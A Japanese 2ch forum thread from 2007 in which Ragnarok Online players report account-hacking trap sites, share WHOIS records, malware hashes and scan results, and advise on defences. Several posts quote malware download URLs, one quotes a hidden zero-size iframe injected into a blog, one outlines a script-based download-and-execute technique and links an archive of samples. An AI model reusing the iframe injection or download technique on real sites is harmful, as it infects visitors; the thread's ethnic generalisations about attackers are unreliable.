次回から（こんなこと２度とおきてほしくないですが）
LiveROを使わせていただきます（向こうにそんなスレがあるのは知りませんでした
本当にすみません）

お答えいただいた皆さん。本当にありがとうございました

>>257さん

DIYはやっていませんしまったく心当たりがありませんので
少し気味が悪いです・・・

261 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 00:49 ID:DQ0n26iN0

リョービって電動工具とかの大手メーカーだよな・・・ｗ
いい趣味を持ってる、と思ったら違うのか

262 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 02:17 ID:NCQUM/it0

鯖板の攻城戦関係スレに垢ハックサイトと思しきアドレスが貼り付けてあったので報告。
aguseで調べるとサーバが中国にありました。

http://www■blog-livedoor■net/game/

263 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 02:27 ID:2eRjBPno0

>>255のレスでひとしきり吹いたが、今は釣り具部門を上州屋に譲渡済みなんだよな。
まぁ、スレ違いもこの辺でやめておく。

264 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 06:03 ID:Nl4E7Qbo0

不買系ブログに書き込まれているのを発見しました。
今までのアカハックと同じような書き込みで
場の空気読めていない+まったく関係のない内容
それが書き込み内容を替えて2回も書き込まれてる

ｆｃ２ブログのアドに見えるんだけど一応用心してaguseで調べてみた
中身画像みるには1/1から更新されていないテイルズウィーバー関連の
やる気無さそうなブログ（aguseスクリーンショット）
発信地はサンフランシスコ　確かにｆｃ２らしい

ただ、無害なブログなら二回も貼られている理由がわからないので検討お願いしたいです。

ttp://mohumohhu■blog87■fc2.com/

265 ：264 sage ： 2007/03/27(火) 06:09 ID:Nl4E7Qbo0

セキュリティのほうの394-395で既出でした
失礼しました。

266 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 06:18 ID:AERkqbz30

>>264
これはクラックされたものと考えられる。
文末に以下を呼ぶIFRAMEタグが仕込まれていた。
game-fc2blog■com

リネージュ資料室の【感染源サイト−ごま醤油日記サイト】でも
FC2ブログクラックが2件記載されているのでまたかと言う印象。

このことからわかるだろう、相手は金のためならクラックだろうがなんだろうが平気でやる。
ネタとか笑い話とかもはやそういう次元ではないよ、サイト持ちはいつ自分のが垢ハックサイトになるかもしれないのだからね。

今回のはある日突然垢ハックブログになっていたと言う典型的事例。
ここのブログクラックは継続的に行なわれているようだからFC2ブログユーザは要注意。

267 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 06:57 ID:AERkqbz30

ソースチェッカーでは仕込まれていたけど、今は対処されているみたい。
そのブログへ行ってみたがソース文末から問題のは消えている。
すでにFC2へ連絡が行ったかな？
これがクラックではなくどっかのブログのパクリなら今後も危険なので近寄らないほうが良いと思う。
それにしても国内フリーブログも悪用され放題だ、海外からの登録不可にすれば良いのに。

268 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 08:52 ID:0H4Zs5qa0

究極のアカウントハック対策はＲＯやめてカード使うの辞める事

269 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 11:14 ID:9j0NoLu10

不安ならウィルスチェックやスパイウェアのチェックしとき。
>>1-6 に関連サイト載ってるから。

270 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 11:46 ID:AERkqbz30

>>262
お約束ですが、毎度おなじみ福建人のドメインですね！
同じディレクトリ上にあるsvchと言う実行ファイルを呼び出す罠があった。

この登録情報（名義人と住所郵便番号）にピンと来たらアカハック
多少変えている(変装している）ことがあります。

Domain Name ..................... blog-livedoor■net
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

271 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 18:07 ID:IL1Lvels0

連中が使用しているレジストラである、pcinc■cnによると、
.cn → 30元/年
.com/.net → 60元/年
つまり、ドメイン取得費用はたかだか458円、ないしは915円程度なのである。

物価の違いこそあれど、これは確かに微々たる初期費用とも言えるな。

272 ：(^ー^*)ノ〜さん asge ： 2007/03/27(火) 18:12 ID:8LhBp/tO0

【　 　 　 気付いた日時　 　 　 　 　 】 3/26 21時頃
【不審なアドレスのクリックの有無　】 廃スレ　アサwiki
【他人にID/Passを教えた事の有無】 Yes
【他人が貴方のPCを使う可能性の有無】 No
【 　 　ツールの使用の有無　 　 　 】 No
【　 ネットカフェの利用の有無　 　　】 Yes ただし半年以上前
【　 　　 OS　 　 】 W2K SP2
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 暇なときにやっておく　程度
【　アンチウイルスソフト 】 NortonInternetSecurity2006
【その他のSecurty対策 】 ルータのみ
【 ウイルススキャン結果】 13個のウィルスを発見　該当ウィルスを駆除するツールを実行したら
ノートンで次々と発見のウィンドウが出てきた。
【スレログやテンプレを読んだか】 今から読みます
【説明】ハエ、青J、イグ葉、サンタ帽子等、総資産10ｋ未満程度のアイテムのみ残っていた。
推定被害額120M？

273 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 19:35 ID:gOli20/30

>>272
もう盗まれるものなさそうなので、状況記録の保全くらいしかないね。
最後に自分でログインした日時と、倉庫内などのＳＳとか記録して、管理会社に提出。

クリーンな環境からパス変更もやった方がいいかもね。

垢ハックなのか、教えた他人の仕業かがわからないので、助言できそうなことはない。
テンプレにあることを読んで、再発しないように注意してくれ。

274 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 19:55 ID:xjOemBMd0

他人に教えてる段階で被害は出せない気がするけどな
教えた相手が何度も入ってるような状況なら尚更

275 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 20:03 ID:IL1Lvels0

廃スレ出入りと、他人とpass情報共有という所から、ギルド共有倉庫なんじゃないか。
人間関係の修復は難しいだろうし、もう引退しかなさそうだな。

276 ：(^ー^*)ノ〜さん ： 2007/03/27(火) 20:48 ID:GxYWZbchO

垢共有ですか＾＾；
真っ黒ギルドとして通報しますね＾＾；；；；；

277 ：(^ー^*)ノ〜さん sage ： 2007/03/27(火) 21:22 ID:UMXKAAdV0

>>276
ｽｰﾊﾟｰﾊｶｰ様

そのギルドも特定してくださいね^^；

278 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 01:27 ID:gauOsDMx0

G倉庫で120Mとか少なすぎるでしょ＾＾

279 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 01:31 ID:qIJPZniA0

>>275-279
俺も含めてまとめて雑談スレ行けや

280 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 05:28 ID:hsku5JeF0

【　　アドレス 　 】 http://64■233■179■104/
【気付いた日時】 踏んだ日にちは3/27
【　 　　 OS　 　 】 windows XP
【使用ブラウザ 】 IE6.0？
【WindowsUpdateの有無】三日ほど前
【　アンチウイルスソフト 】 なし
【その他のSecurty対策 】 わかりません
【 ウイルススキャン結果】 これから無料のオンラインスキャンをしてみます
【スレログやテンプレを読んだか】 YES

ブログのアクセス解析にあったアドレスなのですが、見たこともないアドレスで不安です。
一応YAHOOあたりでアドレス丸ごと検索かけてみたのですが、グーグルが出てきたり
韓国語のページが出てきたりしました。垢ハックアドレスの類じゃなければいいのですが…
一体何なのかよくわかりません。有害なアドレスなのでしょうか。

281 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 07:43 ID:B9GLjkXs0

>>280
Googleが所有しているＩＰ
よって問題ない

282 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 09:30 ID:qIJPZniA0

>>280
Googleのロボットが巡回した結果残された足跡なんじゃないかな。
垢ハックじゃないので、「今回の投稿分については」気にする必要は無い。

283 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 11:08 ID:jq2gXYad0

でもまぁそのくらい警戒するのは良い事だ。

284 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 12:25 ID:XjdHcj3G0

【　　アドレス 　 】http://whois■domaintools■com/rom776■com
【気付いた日時】 3月28日
【　 　　 OS　 　 】 windows XP Home Edition
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 1週間位前。
【　アンチウイルスソフト 】 ウイルスバスター2006
【その他のSecurty対策 】 ？
【 ウイルススキャン結果】 現在進行中
【スレログやテンプレを読んだか】Yes
【説明】
過去にも出てきている776の偽り？ページを踏んでしまいました。
やはりまだ被害詳細は不明なのでしょうか？
このサイトはまだ被害者はでていないのでしょうかね？心配です。

285 ：280 sage ： 2007/03/28(水) 13:15 ID:pNT8QVTc0

280です
特に心配無いようですね。最近垢ハック露店が出回ってるので滅茶苦茶警戒してました。
皆様もお気をつけて…
ありがとうございました〜

286 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 13:31 ID:zs/XWymN0

>284
domaintoolsのを踏んだのか、それが無いのを踏んだのか。

無印の場合、今も怪しいまま。
domaintools付きの場合は>36-40参照。

287 ：284 sage ： 2007/03/28(水) 13:49 ID:XjdHcj3G0

確かにHP内にはdomaintoolsって文字と英文字がいっぱい書かれていました。

domaintools付きでも怪しいかも？ってところですか？

288 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 14:42 ID:Z1jWfjJF0

まあ>>280くらい滅茶苦茶警戒するくらいでちょうどいいよ。

289 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 15:21 ID:okbop0ib0

>>284
無害だとサイト上で主張している通り、現在のところ特に害はありません。
JavaScriptは ブレイナー社 ( http://brainer.jp/ )のコンテンツ
マッチ広告を表示するもの。

# R.O.M 776を宣伝するサイトと言っておきながら、その表記が
# いい加減だったりするあたりがなんとも。

| 本当は、ちょっと色々と調べるためのページです。
飽きてから何に化けるかわかりませんので、要注意扱いなのは
かわりませんね。

290 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 16:11 ID:uU44Aqr80

>287
簡単に書けば
whois■domaintools■com/rom776■com　→　安全なページ
rom776■com　→　要注意なページ

>39にあるように、domaintoolsはドメイン情報を表示してるサイト。
広告その他も多いが、基本はwhoisの情報を表示してるだけ。
whois情報ってのは>173や>270のようにドメインを取得した人が登録している
内容の事。

つまり>284のアドレスは、rom776■comのドメインを取得した人の情報を
表示してるだけで、何も問題は無い。

怪しいと言われてるのは rom776■com の方で、今のところ無害ではあるが
本家rom776の管理人氏も無関係であると明言してるし、今後どうなるかは不明。

291 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 21:37 ID:2VWMOIzX0

すいません、ちょっと気になったので質問なのですが
先ほどライブドアＨＰにてブログ一覧から人気のページ、ブログをクリックしてみたら
意味不明な内容だったり、真っ白なページだったり・・・

これは偽ページとかじゃないですよね・・・・？

開いたページ
http■//www■livedoor■com/blog

見たのは
■よく眠るために覚えておきたい17のTips
■無料で使える大きめアイコン素材集 10サイト
です。

292 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 21:49 ID:GI08W/La0

>>291
>>1
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

293 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 21:50 ID:qIJPZniA0

>>291
移動よろ

>>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
>
>※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

294 ：(^ー^*)ノ〜さん sage ： 2007/03/28(水) 22:01 ID:SVg+OU6f0

自分のblog（FC2）のコメントに、にアカウントハックアドレスが書かれたので報告に。
すでにまとめサイトに記載されているアドレスではありますが…

------------
投稿者名：ふしのん
書き込み：2007/03/28(水) 10:40
IP：210.16.230.91

本文
訪問及び足跡並びにコメントおおきに
はじめまして。ご訪問ありがとうございます。(*＾ｖ＾*）
URL : ttp://www■kuronowish■net/links/lineage■htm
------------

しかし、アカウントハックについての記事にこのコメントするあたりが何とも。

295 ：291 sage ： 2007/03/28(水) 22:54 ID:2VWMOIzX0

失敬しました。あちらで聞いてみます。

296 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 09:20 ID:goN17QKJ0

>>294

inetnum: 210.16.192.0 - 210.16.255.255
netname: HANINTERNET
descr: HANINTERNET
country: KR

恐らく踏み台かPC房。

297 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 18:14 ID:nN7I8ByO0

BSスレの545に>>262が張られてた。いま消されたけどMMOBBSにも進出ですか。

298 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 18:16 ID:nN7I8ByO0

545 名前：Wiki & ◆F828YQn8a2[] 投稿日：07/03/29(木) 17:41 ID:Ax7xwX9F0
ＤＫとかにイレースかけてＴＵとかできた人いる？
堕落はできるみたいですね＠＠
↓の人のブログ参照
ttp://www■blog-livedoor■net/game/　　　



一応こぴぺ。ピリオドを置換。

299 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 18:38 ID:dUct+BCF0

数日更新サボってたら貼られてしまった
今まで既出のものは弾いてただけでwiki程ではないですが来てました

300 ： ◆sp4Sh9QXGI sage ： 2007/03/29(木) 18:55 ID:aV0/UE450

雑談>>478より
> リネージュ資料室さまの「セキュリティ対策」の「危険サイト」および「危険ドメイン」に２つ追加されています。
> ・www■gsisdokf■net
> ・www■18girl-av■com
> どちらも中華のようです。ドメイン情報を調べられる方、本スレへの転載をお願いします。

いつもの烏龍茶の国からこんにちは、ですね。
後者はどうにもエロ系サイト偽装のようですが。
IPが222■214■216■73　は未出っぽいのでPG2リストに追加しておきます。

301 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/03/29(木) 19:07 ID:aV0/UE450

というわけで更新しました。

が、改めてnslookupに引っ掛けたところIPはjprmthome系のアレでした。
aguse.netで調べたら出てきたIPは何だったのか！

302 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 19:55 ID:hxgcuBFI0

登録情報調べてみました
毎度おなじみ福建人じゃないですか！
郵便番号を竜岩市の364000から成都市の610000に変えてますね。
出鱈目なら何処でも良いだろうものだがわざわざ四川省成都を書き込むんだろう？
ひょっとして成都に連中の支部がある可能性も。


こっちなら誰でも簡単に調べられるからお勧め。
ttp://whois■ansi■co■jp/

上ので調べてこの登録情報にピンと来たらアカハック
多少変えている(変装している）ことがあります。

gsisdokf■net
18girl-av■com

共通情報
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan　(福建省竜岩市)
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000　(四川省成都市の番号に変装)
Registrant Country Code ......... CN

303 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 20:25 ID:WKemy9bK0

垢ハックは許せません。
法律では他人のアカウントで不正にサーバへアクセスしたことによる不正アクセス禁止法違反
他人のＰＣにウィルスを入れたことによる器物損壊罪
になるはず

ＢＯＴは、運営者が禁止しているちょっとゆるせないかな？すむからＢＯＴくらいなら許しますが
垢ハックは他人の財産を奪う最低なことです私は昔ＢＯＴerでしたが、垢ハックをする中華が許せません。

304 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 20:33 ID:YMVHnDB40

目くそ鼻くそを笑う

305 ：294 sage ： 2007/03/29(木) 21:14 ID:UyW4HyHM0

>>294 です。
サイトのアクセス解析にも先日報告したIPが引っかかっていたので、こちらも記載しておきます。

------------
2007/03/28 10:33:51
ページ回数1 サイト回数1 前回? 初回?
モニタ：1024 x 768 x 32bit JavaScript：True Cookie：True
HTTP_REFERER：Favor's Ragnarokさん（アドは省略）
HTTP_USER_AGENT：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
国/言語：中国語
REMOTE_HOST：210.16.230.91
------------

306 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 21:16 ID:a4PAjiWH0

>>303
BOTも正規クライアントを通さず、不正な方法で接続するので不正アクセス
禁止法違反にあたるってこと理解してるか？
結局、自分がセコセコBOTで稼いでるのを尻目に、ｼﾅが全財産を一気に
かっぱいでるのにお咎めなしってのが気に食わないだけだろ。

307 ：(^ー^*)ノ〜さん sage ： 2007/03/29(木) 21:20 ID:0LJTY7L70

とあるROの情報サイトを管理してるんですけど、
つい先日連絡用に設置したweb拍手のコメントに
http://www■biglobe-ne■com/bbs/のアドレスがはられてました。
誘導するようなコメントも貼ってあったのでそういうとこからも
踏まないように気をつけたほうがよさそうですね。

308 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 03:50 ID:DbG8w2KE0

>>306
もしそうだとしても、ＢＯＴはまぁ、いけないことだなぁ
でもアカハックは他人の財産（ゲーム内のアイテムや、ＰＣのデータなど）を奪う悪質な段階となっており
ＢＯＴ以上に許せないのは確か

ＢＯＴは自動に狩、ずるい、ゲームバランス崩れるだけど垢ハックは
正規のプレイヤーだろうと、チーターだろうと
初心者だろうと、中華だろうと無差別に見境なく
ゲームの中の大金といえるアイテムやお金をゴッソリもってかれるのですよ

309 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 04:00 ID:qfuYKkqF0

通貨偽造と窃盗はどっちが悪いとか言ってる様なものなので、その話はもうやめよう。

310 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 04:14 ID:ZgjodrHg0

垢ハクの目的って
アイテム奪って→売ってZenyに→RMTで現金化
だろ
だから、どこぞの管理社みたくRMTを潰しまくれば減ると思うんだ
RMT狙いのBOTも減って一石二鳥じゃないか！


何が言いたいかって言うと
癌ﾁﾈ

311 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 05:28 ID:J6S+jc630

>>1
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

312 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 12:31 ID:7l48I5TT0

>>300
＞IPが222■214■216■73　は未出っぽいのでPG2リストに追加しておきます。
そのIPは中国四川省(SC)ですね、CHINANET-SC。
302のような登録情報を使うことから
やっぱり支部のようなものが四川省、恐らく成都にあるものと。
書き込まれなくとも四川省IPがログにあったら気をつけた方がいいと思う。

313 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 17:04 ID:CiTnYlf20

http://www■interzq■com/bbs
と
http://www■din-or■com/bbs

というリンクが自分のページに書き込まれてました。
一度踏んでしまい、ウィルスチェック（AVG)が検知したのですが・・・少し心配。

同じIPだったのでROのハックサイトへのページなんですね。

314 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 18:25 ID:iVujIkBg0

ですね。既出で

315 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 19:14 ID:V1AFDcdv0

テレポやハエはおろか蝶すら使えないMAPというのはありますか？
BOTを隔離したいのですが。

316 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 19:24 ID:tG4Rxvhd0

基本的に蝶が使えないMAPというのはない。
入ると強制セーブされてポタも取れ、ハエは使えないというBOT隔離に
最適なアサギルドは癌によって潰された。
ただ、よく闇ポタで送られて止まってるのはリヒ宿屋とかで見るな。
古いMAPデータしか持ってないBOTには有効なのかね。

317 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 19:44 ID:fIxxtr+C0

それ以前に完全なスレ違い。

318 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 21:12 ID:J6S+jc630

>>315
マルチは去ね

319 ：(^ー^*)ノ〜さん sage ： 2007/03/30(金) 21:26 ID:7l48I5TT0

リネージュ資料室にて以下が登場
上はなんちゃってFF系掲示板、下はなんちゃって２ちゃん？
(6と2の間にドットを入れればそんな感じ）
www■ffxiforums■net
www■game62chjp■net

登録情報は下は302と同じ登録情報なので省略。
上はメンバーと思しき情報につき掲載。

Domain Name:ffxiforums■net
Registrant:
Zhang xiaolong
shang hai guangzhong road 328
200000

Administrative Contact:
Li hoy
Zhang xiaolong
shang hai guangzhong road 328
Shanghai Shanghai 200000
CN

320 ：(^ー^*)ノ〜さん ： 2007/03/31(土) 18:14 ID:KNmTey+i0

新ドメインを確認、登録情報からして罠利用は確実だ。
302と同じ登録情報。

lovejpjp■com

Domain Name ..................... lovejpjp■com

Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

321 ：(^ー^*)ノ〜さん sage ： 2007/03/31(土) 18:17 ID:CCR2tXmq0

初かきこです

www.geocitylinks■com/
219■102■176■65
ﾌﾞﾛｸﾞで

「あしあと、カキコミありがとう」
ってコメントが書いてあった。
情報系だったら解るがこう言う垢ﾊｸﾋﾄﾞｽ

カキコミ下覚えねーなーと思いつつ踏んでしまった。
一応バスターとカスペルでやりはしたが
カスペルの方でトロイ系のダウンローダー。大丈夫なのか心配･･･。

322 ：(^ー^*)ノ〜さん ： 2007/03/31(土) 18:33 ID:KNmTey+i0

>>321
ダウンローダー検出したなら大丈夫なわけはない。
実行されていなかろうが早急に駆除しないといけないね。
駆除方法などは検索するなりして見つけてくださいね。

それとそのホストはプロキシかな、もしくは協力者をネカフェに入り込ませたかの
どっちかと思われる。
国内にも留学生と言う名の協力者がいるしね。

321のIP、東京の端末。
pl065■nas927■p-tokyo■nttpc■ne■jp

ISPに苦情を入れればいいと思うよ、返答でどっちか分かる。
不特定多数が〜と言う返答だったら大体ネカフェ。
ブログのURLと記事のコピペ、IPか上のリモートホストを書いておかないとダメだからね。
【このIPの苦情先】
abuse@sphere.ad.jp

323 ：(^ー^*)ノ〜さん sage ： 2007/03/31(土) 18:43 ID:CCR2tXmq0

321です
ありがとうございます。早速試してみます
｡･ﾟ･(ﾉ∀`)･ﾟ･｡
本当助かりました

324 ：(^ー^*)ノ〜さん sage ： 2007/03/31(土) 19:34 ID:50UY8b450

最近、新宿・池袋・西川口周辺に韓国・中国系ネットカフェが
（露骨に中国語か韓国語の看板）ネットゲームできるという
触れ込みで看板を出して営業している

こういうところだと一般ISPを利用してる場合が多い。
地域ISPなんだけど顧客にいるんだよ・・・
ISPだけで既に判断つきにくいかもしれない　｡･ﾟ･(ﾉ∀`)･ﾟ･｡

325 ：(^ー^*)ノ〜さん age ： 2007/03/31(土) 21:46 ID:6dEOAI7l0

--------------------------------------------------------
Ro 装備. 血盟すれっど
陽光RO会社 URL:　http■//www■aaa-livedoor■net/ro-navi/
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
＞記事全文まとめ。
http■//www■ro-bot■net/10657/
＞雑誌記事の取り込み画像
http■//www■gemnnammobbs■com
--------------------------------------------------------

↑複数のWikiに今日、新ページ作成か既存ページの改竄でコレが
貼られてるんでWiki利用者は注意ね。

326 ：(^ー^*)ノ〜さん sage ： 2007/04/01(日) 04:52 ID:Pnpsf3Kf0

むしろネットカフェのほうを晒したほうがいいんでね…いやまじで。
そういうのができるのが匿名掲示板の強みだとも思う。

327 ：(^ー^*)ノ〜さん sage ： 2007/04/01(日) 06:00 ID:TDxaNNWn0

俺の行くネットカフェの定員さん可愛いぞ

328 ：(^ー^*)ノ〜さん sage ： 2007/04/01(日) 11:43 ID:06aQ3B7e0

kwsk

329 ：(^ー^*)ノ〜さん sage ： 2007/04/01(日) 18:52 ID:gKkOD5y30

わしのネットカフェは5時間980円だ

330 ：(^ー^*)ノ〜さん sage ： 2007/04/01(日) 21:14 ID:Mag2iSix0

>>325
3/20ぐらいに、リネで危険URL登録されてたHPだね。
先日、知らずに火狐で2回踏んじゃったんだけど（青画面）、今に至っても変化なし。
リネで存在が確認されてから10日以上経過してるし、カスペル先生も対応してるかなと思ったら反応無し。
URLをgoogleで検索するとタイトルが「良いっすね」。

ちなみに、俺が踏んだ時の文が鯖別の雑談板だった。
踏んでからは、PeerGuardian2を搭載したけどね。

331 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 01:53 ID:VD+JmgtH0

>>330
ソースチェッカーで調べてみたけど>>325のは３つとも同じ手口だね。
VBScriptでウイルス本体と思われるEXEファイル(↓)をダウンロードして実行するというもの
VBScriptが動かない環境(Firefoxなど)なら、とりあえず大丈夫だね。
今後中身が変化する可能性もあるから、油断は禁物だけど。

http://www■ro-bot■net/ro-navi/yan■exe (http■//www■aaa-livedoor■net/ro-navi/)
http://www■ro-bot■net/10657/yan■exe (http■//www■ro-bot■net/10657/)
http://www■jprmthome■com/yan■exe (http■//www■gemnnammobbs■com)

実際にダウンロードしてないから分からないけど、同じファイル名だし中身同じなのかなあ。

332 ：(^ー^*)ノ〜さん ： 2007/04/02(月) 05:35 ID:8/5GViwP0

普通アカウントハックなんかされねえよ

お前ら相当あほなんだなww

333 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 05:44 ID:blIV4VOd0

はいそうっすね

Windows狙うゼロデイ攻撃拡大の様相、被害防止の非公式パッチも
ttp://www.itmedia.co.jp/enterprise/articles/0703/31/news011.html

これの公式パッチはまだだろうか・・・

334 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 07:46 ID:6v9lj5000

>>331
検体入手してみるかと思ってダウンロード試みたが、その３ファイル、全部「ページがみつかりません」。

既に移動済みなのか、未設定なのか不明。

335 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 09:27 ID:BUid1IvGO

うちの近所のネカフェは癌公式店のくせに
ウイルス対策ソフトすら入って無いぜ

336 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 10:11 ID:z8FsFrkg0

>>331
サイズ: 48612バイト
MD5: f579f7a5cc4d16ea1d640f1f7944e75d
バスター2007: TSPY_MARAN.D
で３つとも一致。

>>334
iframe src="http://"〜
という記述があって、それが無効な構文エラーを引き起こしているようで。
もちろんアカハックの罠はその裏で…

もしくは経路が悪いのかサーバが悪いのか、通信が非常に遅くて(当方で数百バイト/s)、
それでタイムアウトしたのかもしれない。

337 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 10:23 ID:O/OSYKpq0

もう報告上がっちゃいましたか・・・

>>331
1CD Linuxで検体ダウンロード。ＭＤ５が一致したから、３つは完全に同じファイルだった。
virustotalで各アンチウイルスソフトの対応をチェックした結果↓
ttp://www.virustotal.com/vt/en/resultadof?5d46910dc6be475bb3280af8d5e7dccd

>>334
基本的な問題で、hostsやPG2あたりでブロックしてたとか・・・
うちもWindowsで検体落とそうとすると、その辺をまず解除しなきゃいけなくて・・・
あと、誤爆クリックで実行したら怖いから、やっぱりこういうときは非Win環境が安心。

338 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 10:57 ID:INN++zfe0

こんなリンクがあったので調べると案の定毎度おなじみ福建人のもの。
www■kotonohax■com/blog/nc■htm

暗号化されたスクリプトから以下が呼び出される。
４月２日１０時現在でカスペルスキー未検出、注意！
www■kotonohax■com/blog/xzz■exe


登録情報からしていつもの福建人組織で間違いはないだろう。
Domain Name:kotonohax.com
Registrant:
ling bao
lyzsl
364000
Administrative Contact:
lingbao
ling bao
lyzsl
ly Fujian 364000
CN

339 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 13:47 ID:INN++zfe0

338のxzz■exeをVirusTotalでスキャンすると反応したのは以下だけと言うお寒い状況。

4月2日13時40分時点で反応したもの
BitDefender 7.2 04.02.2007 Backdoor.Agobot.39
eSafe 7.0.15.0 04.01.2007 Suspicious Trojan/Worm
Ikarus T3.1.1.3 04.02.2007 Trojan-Dropper.Win32.Agent.ano
Webwasher-Gateway 6.0.1 04.02.2007 Win32.Malware.gen#ASPack (suspicious)
Fortinet 2.85.0.0 04.02.2007 suspicious
Panda 9.0.0.4 04.01.2007 Suspicious file

340 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 14:35 ID:O/OSYKpq0

337のリンクはすでに見れなくなってますね。
338のも含めてMMOBBSのアップローダに上げておきました。
ttp://www.mmobbs.com/uploader/files/2388.zip

338もEXEファイルダウンロード〜実行までの手口は331と全く同じです。
(先日調べた限りは、lovetwやinterzqなども同じ手口です↓)

VBScriptまたはJScriptでMicrosoft.XMLHTTPおよびAdodb.Streamという
２つのActiveXコントロールを生成する方法が多くの罠サイトで見受けられますので、
・VBScriptおよびJScriptをOFFにすること (IE系ブラウザを使わないのが無難)
・Windows Updateを行うことにより、上記２つのActiveXコントロールの脆弱性をなくすこと
が効果的な対策になると思われます。

341 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 15:40 ID:8u+1mCXp0

嫌なパターンが。

| 神器材料買取　ひっとん　【2007/04/02 13:18:39】 HomePage [返信] [削除]
|
| 神器材料買取してます、何かあればお声をおかけください。
| 白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
| 販売価格及び交換比率は各自お問い合わせください。
| その他応相談　※身内特典あり（詳しくは本人まで）
| http://csfir.blog87.fc2■com/

URLは本物の fc2ブログだが、ソースを見ると </body>直前に lovetwが埋まってる。
二日分しかないあたり、どこかのblogをコピった偽者か。

<iframe src="http://www.lovetw.webnow■biz/2jp" width="0" height="0" frameborder="0"></iframe></body>


# fc2へは一応連絡済。

342 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 16:03 ID:6v9lj5000

>>338-339
NOD32とF-Secure、キングソフトには検体提出してきました。
あとは提出窓口知らないので、各セキュリティソフトの使用者各自でよろしゅ。

343 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 16:11 ID:JhH5Bh/10

リネージュ資料室を見てて気がついたけど、短縮URLを使い始めたな。

あとアニメーションアイコン(ani)の脆弱性、
既に攻撃コード開発ツールも出回っておりトロイとして拡散中。
IE7とかでも普通にやられる。つーかやられた。

検体を送ろうと拾ったファイルの拡張子をエクスプローラでaniにした途端
実行しやがったので回線引っこ抜いた。aniを描画する過程で実行されることと、
エクスプローラはナチュラルにaniを表示するので注意(Windows\Cursorsを見よ)。

344 ：ももカヽ ： 2007/04/02(月) 16:18 ID:+GNS09w2O

垢ハックにみんなまけるな！

345 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 16:22 ID:/sF2VlwG0

>>341
